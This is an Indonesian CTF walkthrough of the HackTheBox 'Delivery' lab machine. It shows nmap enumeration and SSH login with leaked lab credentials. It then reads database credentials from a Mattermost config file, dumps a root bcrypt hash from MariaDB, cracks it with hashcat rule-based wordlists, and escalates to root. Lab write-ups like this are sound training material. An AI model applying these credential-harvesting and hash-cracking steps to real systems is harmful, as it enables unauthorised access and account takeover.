HashCat: Rules Type Base64

Author: anonputraid

Delivery

INTRO

HackThebox Delivery Adalah Box Dengan Tingkat Kesulitan Mudah ,Tingkat Mechine Matrix Lebih Mengarah Ke Custom Exploitation ,Application Yang Retan Dimesin Tersebut Adalah Mattermost ,Exploitation : MySQL: Useful Resources ,MySQL: Sorting Result ,MySQL: Select Query ,Dan Memacahkan Password Menggunakan HashCat: Rules Type Base64.

CTF

  • Custom Exploit

  • Enumeration

Alat-Alat Hacking:

  • nmap

  • hashcat

NMAP SCAN

Open ports :

22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    nginx 1.14.2

Added Domain/IP dari mesin ke /etc/hosts : 

sudo nano /etc/hosts + 10.10.10.222 delivery.htb helpdesk.delivery.htb

ENUMERATION

Create : Open Ticket, Verify Email, Mattermost 

ssh [email protected]
Passwordd: Youve_G0t_Mail!

Output:

maildeliverer@Delivery:~$

PRIVILAGE ESCALATION

Create Rule Wordlists

echo -n "PleaseSubscribe!" > rule

Find Mattermost Folder

Login SSH Server: maildeliverer:Youve_G0t_Mail!

cd /tmp && find / -name "mattermost*" > save.txt
cat save.txt

Output : 

/opt/mattermost/config
cd /opt/mattermost/config
cat config.json

Output:

"DataSource":"mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s

Hash Pass Root

mysql -h localhost -u mmuser -pCrack_The_MM_Admin_PW

Output

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mattermost         |
+--------------------+
2 rows in set (0.000 sec)
MariaDB [(none)]> use mattermost;
Database changed
MariaDB [mattermost]> show tables;

Output:

+------------------------+
| Tables_in_mattermost   |
+------------------------+
| Users                  |
+------------------------+
46 rows in set (0.001 sec)
MariaDB [mattermost]> desc Users;

Output:

+--------------------+--------------+------+-----+---------+-------+
| Field              | Type         | Null | Key | Default | Extra |
+--------------------+--------------+------+-----+---------+-------+
| Username           | varchar(64)  | YES  | UNI | NULL    |       |
| Password           | varchar(128) | YES  |     | NULL    |       |
+--------------------+--------------+------+-----+---------+-------+
25 rows in set (0.001 sec)
MariaDB [mattermost]> select Username,Password from Users;

Output:

+--------------+--------------------------------------------------------------+
| Username     | Password                                                     |
+----------------------------------+------------------------------------------+
| root         | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
+----------------------------------+------------------------------------------+
19 rows in set (0.000 sec)

Create File In Local Server :

echo "$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO " > hashroot.txt

HashCat Rule

$ ls -la /usr/share/hashcat/rules

Output:

-rw-r--r-- 1 root root    933 Jul 31 20:09 best64.rule
hashcat -r /usr/share/hashcat/rules/best64.rule --stdout rule > wordlists.txt
 wc -l wordlists.txt

Output:

77 wordlists.txt
hashcat -m 3200 -a 0 hashroot.txt wordlists.txt

Output:

$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21

Root

su root && password : PleaseSubscribe!21

Output

maildeliverer@Delivery:~$ su root

Last updated

Was this helpful?